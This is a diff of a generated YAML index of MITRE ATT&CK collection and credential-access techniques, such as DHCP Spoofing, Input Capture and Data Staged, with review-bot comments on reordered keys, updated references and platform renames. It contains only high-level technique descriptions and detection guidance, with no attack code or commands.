@@ -40044,7 +40603,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560
atomic_tests: []
T1185:
@@ -40081,7 +40639,7 @@ collection:
description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual.
Retrieved May 24, 2017.
source_name: cobaltstrike manual
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-25T18:58:15.229Z'
name: Browser Session Hijacking
description: |-
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
@@ -40109,12 +40667,10 @@ collection:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -40151,23 +40707,23 @@ collection:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
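Review bot: this hunk is a pure reordering of existing keys in T1557.003 (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_domains` and `x_mitre_is_subtechnique` are added near the top and deleted from their old positions) with no value changes. Reorder-only hunks make the real edits in this diff harder to spot; if the generator now emits keys in a fixed order, say so in the PR description, and keep that order stable so future regenerations do not churn these objects again.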
@@ -40200,21 +40756,20 @@ collection:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
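Review bot: the updated `solution_monitor_dhcp_scopes` reference says `Retrieved September 12, 2024.` while the new `url` points at a Wayback snapshot dated `20231202025258`, so the retrieval date is later than the snapshot being cited. That wording comes from the upstream export and should not be hand-edited in a generated file, but anyone validating references by date should expect the mismatch. Swapping the dead `lockstepgroup.com` link for the archived copy is otherwise the right call.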
@@ -40322,12 +40877,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -40338,13 +40892,13 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -40358,6 +40912,7 @@ collection:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -40368,12 +40923,12 @@ collection:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1125:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.205Z'
name: Video Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
@@ -40418,30 +40973,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1125
atomic_tests: []
T1213.001:
technique:
- x_mitre_platforms:
- - SaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- created: '2020-02-14T13:09:51.004Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-30T13:45:42.840Z'
name: Confluence
description: |2
@@ -40451,31 +40987,48 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+ created: '2020-02-14T13:09:51.004Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/001
+ external_id: T1213.001
+ - source_name: Atlassian Confluence Logging
+ description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+ Retrieved April 4, 2018.
+ url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1114.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Email Forwarding Rule'
description: "Adversaries may setup email forwarding rules to collect sensitive
information. Adversaries may abuse email forwarding rules to monitor the activities
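Review bot: `x_mitre_permissions_required` (`- User`) is removed from T1213.001 without a replacement, and the same field disappears from Input Capture (T1056) further down (`Administrator`, `SYSTEM`, `root`, `User`), whereas T1602.002 keeps its `x_mitre_permissions_required` block as unchanged context. After this change the field is therefore present on some objects and absent on others depending on which ones were re-exported; check whether any index or documentation generator in this repo still reads it, because it would now silently get nothing for the updated techniques. Two real content edits are also buried in this mostly-reordering hunk and deserve a mention: the `Testing / development credentials` bullet gains an `[Unsecured Credentials]` link, and `x_mitre_version` moves from `'1.0'` to `'1.1'`.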
@@ -40508,10 +41061,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Security
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- Liran Ravich, CardinalOps
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -40520,16 +41075,17 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
+ - 'Cloud Service: Cloud Service Metadata'
type: attack-pattern
id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
created: '2020-02-19T18:54:47.103Z'
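Review bot: the platform change here (`- Office 365` and `- Google Workspace` removed, `+ Office Suite` added) is a rename in the platform taxonomy, not a reorder, and it repeats for Remote Email Collection (T1114.002) and Data from Information Repositories (T1213) later in the diff. Anything keyed on the old platform names, such as per-platform index files or platform filters in the test runner, needs to be regenerated or mapped to the new name in the same change; otherwise these techniques drop out of the old platform views without appearing in a new one. The new `'Cloud Service: Cloud Service Metadata'` data source and the `'1.3'` to `'1.4'` version bump are consistent with that upstream revision.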
@@ -40561,70 +41117,66 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests: []
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
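Review bot: the Mandiant M-Trends 2020 reference changes its target from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` inside a hunk that is otherwise a wholesale reorder of T1074, which makes it easy to miss. It is the only reference in this object whose destination changes rather than being archived, so confirm the new PDF link resolves before merge. Apart from that URL and the `x_mitre_attack_spec_version` bump from `2.1.0` to `3.2.0`, the moved blocks (`modified`, `name`, `kill_chain_phases`, contributors, platforms, `external_references`) carry the same values as the lines they replace.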
@@ -40697,7 +41249,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1039:
@@ -40752,12 +41303,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests: []
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -40769,6 +41319,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -40776,11 +41329,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -40797,14 +41350,11 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -40820,6 +41370,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -40828,13 +41379,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -40842,15 +41393,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
@@ -40861,9 +41408,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
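Review bot: the newly added T1213.004 (Customer Relationship Management Software) ships with `x_mitre_detection: ''` rather than a detection paragraph, which is how upstream provides it; every other object in this diff has non-empty text there, so if any renderer in this repo prints the detection field, confirm it treats an empty string the same way as a missing key. `atomic_tests: []` is correct for a new entry with no tests yet. Note that the `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` lines at the top of this hunk close out Input Capture (T1056) and belong to that object, not to the new sub-technique.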
@@ -40909,7 +41507,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -40928,37 +41526,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -40981,41 +41578,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
